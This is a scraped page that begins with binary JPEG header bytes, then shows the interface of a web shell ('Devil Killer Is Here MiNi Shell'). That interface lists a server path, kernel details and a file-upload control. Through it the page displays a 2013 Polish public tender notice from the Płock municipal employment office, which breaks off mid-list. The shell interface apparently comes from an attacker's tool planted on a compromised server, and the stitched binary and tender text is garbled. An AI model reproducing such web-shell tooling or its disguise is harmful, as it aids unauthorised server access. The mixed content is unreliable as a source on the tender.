JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130729/300342-N-2013.html

<p class="kh_header"><b>Płock: Świadczenie usług z ramienia Lidera  (MUP w Płocku) w projekcie pn.: Aktywny niepełnosprawny na płockim rynku pracy nr POKL.07.04.00-14-029/12, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.4 Niepełnosprawni na rynku pracy</b><br>
<b>Numer ogłoszenia: 300342 - 2013; data zamieszczenia: 29.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Urząd Pracy , ul. 3 Maja 16, 09-400 Płock, woj. mazowieckie, tel. 0-24 367 18 30, faks 0-24 367 18 31.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług z ramienia Lidera  (MUP w Płocku) w projekcie pn.: Aktywny niepełnosprawny na płockim rynku pracy nr POKL.07.04.00-14-029/12, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.4 Niepełnosprawni na rynku pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług z ramienia Lidera  (MUP w Płocku) w projekcie pn.: Aktywny niepełnosprawny na płockim rynku pracy nr POKL.07.04.00-14-029/12, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.4 Niepełnosprawni na rynku pracy - ilość części 6.
Część 1 - Kierownik projektu.
Część 2 - Asystent Kierownika projektu
Część 3 - Obsługa księgowa.
Część 4 - Pracownik ds. rekrutacji, informacji i promocji.
Część 5 - Doradca zawodowy w ramach zindywidualizowanego wsparcia.
Część 6 - Psycholog w ramach zindywidualizowanego wsparcia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 85.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
CZĘŚĆ 1 - Kierownik projektu.
a) wykształcenie wyższe magisterskie, kierunek: zarządzanie, 
b) co najmniej roczne doświadczenie zawodowe w zarządzaniu projektami współfinansowanymi ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego na stanowisku koordynator projektu, kierownik projektu,
c) posiadanie wiedzy z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych z Unii Europejskiej,
d) pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych,
e) niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
CZĘŚĆ 2 -  Asystent Kierownika projektu.
a)	wykształcenie wyższe kierunek: pedagogika specjalność: pedagogika opiekuńczo-wychowawcza,
b)	co najmniej 1 rok doświadczenie w realizacji projektów współfinansowanych ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego,
c)	posiadanie wiedzy z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych ze środków Unii Europejskiej,
d)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
e)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
CZĘŚĆ 3 -  Obsługa księgowa.
a)	wykształcenie wyższe magisterskie, kierunek: ekonomia,
b)	co najmniej roczne doświadczenie zawodowe w Publicznych Służbach Zatrudnienia,
c)	doświadczenie w rozliczaniu projektów współfinansowanych ze środków Unii Europejskiej,
d)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
e)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.

CZĘŚĆ 4 - Pracownik ds. rekrutacji, informacji i promocji.
a) 	wykształcenie wyższe  kierunek: ekonomia, specjalność: Finanse publiczne i administracja,
 b) 	co najmniej półroczne doświadczenie zawodowe w Publicznych Służbach Zatrudnienia,
 c) 	znajomość ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz aktów normatywnych tej ustawy,
 d) 	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
 e) 	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.

CZĘŚĆ 5 - Doradca Zawodowy w ramach zindywidualizowanego wsparcia.
a)	wykształcenie wyższe magisterskie, 
b)	studia podyplomowe z zakresu doradztwa zawodowego,
c)	co najmniej 3 letni staż pracy w Publicznych Służbach Zatrudnienia,
d)	znajomość ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz aktów normatywnych tej ustawy,
e)	ukończenie szkolenia z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych ze środków Unii Europejskiej,
f)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
g)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.
CZĘŚĆ 6 - Psycholog w ramach zindywidualizowanego wsparcia.
a)	wykształcenie wyższe magisterskie, kierunek: psychologia,
b)	co najmniej 3 letnie doświadczenie zawodowe na stanowisku psychologa,
c)	co najmniej roczny staż pracy w Publicznych Służbach Zatrudnienia,
d)	doświadczenie w zakresie świadczenia indywidualnych porad psychologicznych, wsparcia psychologicznego dla osób niepełnosprawnych,
e)	doświadczenie w realizacji projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w zakresie aktywizacji zawodowej osób niepełnosprawnych wchodzących na rynek pracy,
f)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych, 
g)	niekaralność za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Formularz oferty - Załącznik Nr 1 do SIWZ.
2) Pełnomocnictwo (oryginał lub kopia poświadczona notarialnie)) osoby lub osób podpisujących ofertę -  jeżeli uprawnienie do podpisu nie wynika bezpośrednio  z załączonych dokumentów.
3) W przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone liderowi /patrz Rozdział I pkt 12/
4) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zawarte w Załączniku Nr 4 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy PZP, Zamawiający dopuszcza zmiany umowy w zakresie: 
- przypadków losowych, które będą miały wpływ na treść zawartej umowy i termin realizacji,
- zmiany terminu realizacji projektu, w ramach którego umowa jest realizowana, co będzie miało wpływ na zmianę terminu obowiązywania niniejszej umowy,
- zmiany osób, które będą uczestniczyć w wykonaniu zamówienia, jeżeli zmiany są korzystne dla Zamawiającego lub wywołane okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy,
do zmiany osoby uczestniczącej w wykonaniu zamówienia wymagane jest łączne spełnienie następujących warunków:
a) przedstawienie osoby, której kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia nie są niższe niż osoby zastępowanej, 
b)złożenie informacji na temat kwalifikacji zawodowych, doświadczenia i wykształcenia, zakresu wykonywanych czynności oraz informacji o podstawie do dysponowania tą osobą,
c) uzyskanie przez Wykonawcę uprzedniej zgody Zamawiającego na zmianę osoby uczestniczącej  w wykonaniu zamówienia,
- zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, zmiany będące następstwem działania organów administracji.
2. Wszelkie zmiany i uzupełnienia umowy wymagają akceptacji obu stron i formy pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mup.bip.ump.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Urząd Pracy w Płocku ul. 3 Maja 16, 09-400 Płock - pok.104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 10:00, miejsce: Miejski Urząd Pracy w Płocku ul. 3 Maja 16, 09-400 Płock - pok.102 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Aktywny niepełnosprawny na płockim rynku pracy nr POKL.07.04.00-14-029/12, realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.4 Niepełnosprawni na rynku pracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Kierownik projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Kierownika projektu:
1.	Zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.).
2.	Koordynacja i nadzór nad współpracą z Koordynatorem u Partnera 1 i z Koordynatorem  u Partnera 2                 w zakresie ustalenia szczegółów umowy partnerskiej i wypracowania wspólnych reguł i zasad współpracy.
3.	Nadzór nad terminowością i prawidłowością przypisanych zadań dla Lidera, Partnera 1 i Partnera 2.
4.	Weryfikowanie postępu rzeczowego i finansowego przydzielonych zadań dla Lidera, Partnera 1                         i Partnera 2.
5.	Bieżący nadzór nad zgodnością przypisanych działań z harmonogramem i budżetem projektu.
6.	Nadzór nad działaniami informacyjno - promocyjnymi.
7.	Nadzór nad poprawnością dokumentacji, tworzonej w trakcie realizacji projektu. 
8.	Przygotowanie wniosków o wyłonienie personelu projektu z ramienia Lidera oraz kadry zaangażowanej              w realizację przypisanych działań.
9.	Koordynacja pracy personelu projektu oraz pozostałej kadry zaangażowanej w realizację przypisanych zadań z ramienia Lidera a także z ramienia Partnera 1 i Partnera 2.
10.	Nadzór nad prawidłowym wypełnianiem obowiązków przez personel projektu z ramienia Lidera, weryfikacja czasu pracy.
11.	Nadzór nad właściwym przebiegiem rekrutacji uczestników projektu.
12.	Sprawdzanie kwalifikowalności uczestników projektu w oparciu o przyjęte kryteria zgodnie z wnioskiem              o dofinansowanie projektu oraz dokumentami programowymi.
13.	Współudział w analizie dokumentów rekrutacyjnych. 
14.	Nadzór nad wprowadzaniem danych do Formularza PEFS 2007 dla PO KL.
15.	Nadzór nad prawidłowością polityki finansowej i zakresu merytorycznego projektu.
16.	Przygotowanie dokumentów do zawierania umów z dostawcami usług i towarów.
17.	Bieżąca analiza zagrożeń w realizacji powierzonych zadań.
18.	Nadzór nad prawidłową i sprawną realizacją umowy partnerskiej.
19.	Nadzór nad przygotowaniem wniosków o płatność.
20.	Sprawdzanie pod względem merytorycznym zgodności wydatków, przydzielonych Liderowi i Partnerom,           z przyjętym harmonogramem i budżetem projektu.
21.	Wnioskowanie o dokonywanie bieżących zakupów przewidzianych w budżecie Lidera.
22.	Bieżąca kontrola stopnia osiągania celów partnerstwa.
23.	Udział w spotkaniach zespołu projektowego.
24.	Prowadzenie miesięcznych kart czasu pracy.
25.	Przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Asystent Kierownika projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadania i organizacja pracy Asystenta Kierownika projektu
Zakres zadań Asystenta Kierownika projektu:
1.	Zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.).
2.	Bieżąca współpraca z Koordynatorem u Partnera 1 i z Koordynatorem u Partnera 2 w zakresie ustalenia szczegółów umowy partnerskiej i wypracowania wspólnych reguł i zasad współpracy.
3.	Nadzór nad sprawnym przepływem informacji i dokumentów między Liderem i Partnerami.
4.	Opracowanie dokumentacji, niezbędnej przy realizacji projektu.
5.	Prowadzenie ewaluacji projektu i działań - wywiady z uczestnikami projektu, ankiety.
6.	Monitoring wskaźników w początkowej i końcowej fazie każdej formy wsparcia - ankiety, hospitacja zajęć, raport końcowy.
7.	Prowadzenie bieżącej sprawozdawczości z podejmowanych działań Kierownikowi projektu.
8.	Przygotowanie wniosków o wyłonienie personelu projektu z ramienia Lidera oraz kadry zaangażowanej                    w realizację przypisanych działań.
9.	Udział w rekrutacji uczestników projektu. 
10.	Sprawdzanie kwalifikowalności uczestników projektu w oparciu o przyjęte kryteria zgodnie z wnioskiem                 o dofinansowanie projektu oraz dokumentami programowymi.
11.	Organizacja wsparcia dla osób, które uczestniczą w projekcie (w zakresie organizacji warsztatów, szkoleń, indywidualnych spotkań, Indywidualnych Planów Działania, aktywizacji zawodowej itp.), sporządzanie harmonogramów wsparcia, czuwanie nad obecnością uczestników projektu w poszczególnych formach wsparcia, nadzorowanie terminowego i prawidłowego przebiegu poszczególnych form wsparcia przewidzianych dla uczestników projektu.
12.	Przygotowanie dokumentów do zawierania umów z dostawcami usług i towarów.
13.	Bieżąca analiza zagrożeń w realizacji powierzonych zadań.
14.	Zapewnienie prawidłowej i sprawnej realizacji umowy partnerskiej.
15.	Nadzór nad terminowością i prawidłowością przypisanych zadań dla Lidera, Partnera 1 i Partnera 2.
16.	Terminowe sporządzanie sprawozdań merytorycznych na potrzeby wniosku o płatność.
17.	Przygotowywanie wniosków o  płatność.
18.	Wnioskowanie o dokonywanie bieżących zakupów przewidzianych w budżecie Lidera.
19.	Bieżąca kontrola stopnia osiągania celów partnerstwa.
20.	Udział w spotkaniach zespołu projektowego.
21.	Wykonywanie innych zadań zleconych przez Kierownika projektu.
22.	Informowanie w formie pisemnej kierownika projektu o wystąpieniu problemów i trudności w realizacji powierzonego zadania.
23.	Prowadzenie miesięcznych kart czasu pracy.
24.	Przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 - Obsługa księgowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Obsługi księgowej:
1.	Zapoznanie z dokumentacją niezbędną do realizacji projektu (organizacyjną, projektową, itp.).
2.	Stworzenie wyodrębnionej ewidencji księgowej dotyczącej realizacji projektu zgodnie z zasadą przejrzystości wynikającą z ustawy o rachunkowości.
3.	Rozliczanie otrzymanych środków finansowych na zasadach określonych w umowie o dofinansowanie projektu  i w umowie partnerskiej.
4.	Przygotowanie niezbędnych dokumentów potwierdzających poniesienie wydatków do dekretowania                          i księgowania.
5.	Pozyskiwanie informacji o wszystkich uczestnikach zadań realizowanych przez Lidera, Partnera 1                    i Partnera 2.
6.	Monitorowanie, dekretowanie i sprawdzanie pod względem formalnym i rachunkowym dokumentów potwierdzających wydatki ponoszone w ramach przydzielonych zadań.
7.	Monitorowanie zmian w wytycznych w zakresie sprawozdawczości i rozliczania projektów współfinansowanych ze środków UE.
8.	Opisywanie dokumentacji zgodnie z wytycznymi Instytucji Wdrażającej.
9.	Przygotowywanie harmonogramów zakupów.
10.	Nadzór nad prawidłowością składanych przez Partnera 1 i Partnera 2 dokumentów finansowych (zestawień poniesionych wydatków) w terminach określonych umową partnerską.
11.	Monitorowanie wykonania budżetu projektu w części przypadającej na Lidera, Partnera 1   i Partnera 2.
12.	Przygotowywanie dokumentacji niezbędnej:
	- do naliczenia wynagrodzeń osób świadczących usługi w projekcie,
	- do sporządzenia listy płac,
	- do sporządzenia deklaracji ZUS i deklaracji podatkowych.
13.	Terminowe przygotowywanie dokumentacji do dokonywania przelewów i rozliczania środków pieniężnych na wyodrębnionym rachunku bankowym.
14.	Monitorowanie wykonania harmonogramu rzeczowo-finansowego budżetu Lidera, Partnera 1 i Partnera 2.
15.	Przygotowywanie wniosków o płatność i przekazywanie ich do Instytucji Wdrażającej (Instytucji Pośredniczącej II stopnia).
16.	Bieżąca współpraca z Księgowymi projektu od strony Partnera 1 i Partnera 2 w zakresie rozliczania finansowego projektu.
17.	Wykonywanie innych zadań związanych z realizacją projektu, zleconych przez Kierownika projektu.
18.	Udział w spotkaniach zespołu projektowego.
19.	Informowanie w formie pisemnej kierownika projektu o wystąpieniu problemów i trudności w realizacji powierzonego zadania.
20.	Prowadzenie miesięcznych kart czasu pracy.
21.	Przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4 - Pracownik ds. rekrutacji, informacji i promocji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Pracownika ds. rekrutacji, informacji i promocji:
1)	Zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.).
2)	Opracowanie dokumentów rekrutacyjnych - regulaminu, deklaracji, oświadczeń.
3)	Przeprowadzenie rekrutacji uczestników projektu.
4)	Sprawdzanie kwalifikowalności uczestników projektu w oparciu o przyjęte kryteria zgodnie z wnioskiem                 o dofinansowanie projektu oraz dokumentami programowymi.
5)	Współudział w analizie dokumentów rekrutacyjnych.
6)	Sporządzanie zestawień (list uczestników projektu), w tym list podstawowych oraz list rezerwowych.  
7)	Prowadzenie dokumentacji w zakresie działań rekrutacyjnych.
8)	Prowadzenie dokumentacji osobowej uczestników projektu.  
